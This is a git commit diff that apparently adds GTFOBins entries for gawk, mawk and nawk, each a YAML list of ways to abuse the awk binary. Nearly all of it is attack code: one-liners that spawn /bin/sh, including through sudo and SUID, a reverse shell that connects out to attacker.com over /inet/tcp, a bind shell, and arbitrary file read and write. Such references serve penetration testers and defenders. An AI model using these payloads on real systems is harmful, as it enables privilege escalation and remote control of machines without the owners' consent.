adding gawk, nawk, mawk

2025-10-31 16:58:36 +01:00 · 2019-08-30 15:10:25 +02:00
parent 2b005a1153
commit 977232c45c
3 changed files with 102 additions and 0 deletions
--- a/_gtfobins/gawk.md
+++ b/_gtfobins/gawk.md
@@ -0,0 +1,34 @@
+---
+functions:
+  shell:
+    - code: gawk 'BEGIN {system("/bin/sh")}'
+  non-interactive-reverse-shell:
+    - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
+      code: |
+        RHOST=attacker.com
+        RPORT=12345
+        gawk -v RHOST=$RHOST -v RPORT=$RPORT 'BEGIN {
+            s = "/inet/tcp/0/" RHOST "/" RPORT;
+            while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break;
+            while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
+  non-interactive-bind-shell:
+    - description: Run `nc target.com 12345` on the attacker box to connect to the shell.
+      code: |
+        LPORT=12345
+        gawk -v LPORT=$LPORT 'BEGIN {
+            s = "/inet/tcp/" LPORT "/0/0";
+            while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break;
+            while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
+  file-write:
+    - code: |
+        LFILE=file_to_write
+        gawk -v LFILE=$LFILE 'BEGIN { print "DATA" > LFILE }'
+  file-read:
+    - code: |
+        LFILE=file_to_read
+        gawk '//' "$LFILE"
+  sudo:
+    - code: sudo gawk 'BEGIN {system("/bin/sh")}'
+  limited-suid:
+    - code: ./gawk 'BEGIN {system("/bin/sh")}'
+---
--- a/_gtfobins/mawk.md
+++ b/_gtfobins/mawk.md
@@ -0,0 +1,34 @@
+---
+functions:
+  shell:
+    - code: mawk 'BEGIN {system("/bin/sh")}'
+  non-interactive-reverse-shell:
+    - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
+      code: |
+        RHOST=attacker.com
+        RPORT=12345
+        mawk -v RHOST=$RHOST -v RPORT=$RPORT 'BEGIN {
+            s = "/inet/tcp/0/" RHOST "/" RPORT;
+            while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break;
+            while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
+  non-interactive-bind-shell:
+    - description: Run `nc target.com 12345` on the attacker box to connect to the shell.
+      code: |
+        LPORT=12345
+        mawk -v LPORT=$LPORT 'BEGIN {
+            s = "/inet/tcp/" LPORT "/0/0";
+            while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break;
+            while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
+  file-write:
+    - code: |
+        LFILE=file_to_write
+        mawk -v LFILE=$LFILE 'BEGIN { print "DATA" > LFILE }'
+  file-read:
+    - code: |
+        LFILE=file_to_read
+        mawk '//' "$LFILE"
+  sudo:
+    - code: sudo mawk 'BEGIN {system("/bin/sh")}'
+  limited-suid:
+    - code: ./mawk 'BEGIN {system("/bin/sh")}'
+---
--- a/_gtfobins/nawk.md
+++ b/_gtfobins/nawk.md
@@ -0,0 +1,34 @@
+---
+functions:
+  shell:
+    - code: nawk 'BEGIN {system("/bin/sh")}'
+  non-interactive-reverse-shell:
+    - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
+      code: |
+        RHOST=attacker.com
+        RPORT=12345
+        nawk -v RHOST=$RHOST -v RPORT=$RPORT 'BEGIN {
+            s = "/inet/tcp/0/" RHOST "/" RPORT;
+            while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break;
+            while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
+  non-interactive-bind-shell:
+    - description: Run `nc target.com 12345` on the attacker box to connect to the shell.
+      code: |
+        LPORT=12345
+        nawk -v LPORT=$LPORT 'BEGIN {
+            s = "/inet/tcp/" LPORT "/0/0";
+            while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break;
+            while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
+  file-write:
+    - code: |
+        LFILE=file_to_write
+        nawk -v LFILE=$LFILE 'BEGIN { print "DATA" > LFILE }'
+  file-read:
+    - code: |
+        LFILE=file_to_read
+        nawk '//' "$LFILE"
+  sudo:
+    - code: sudo nawk 'BEGIN {system("/bin/sh")}'
+  limited-suid:
+    - code: ./nawk 'BEGIN {system("/bin/sh")}'
+---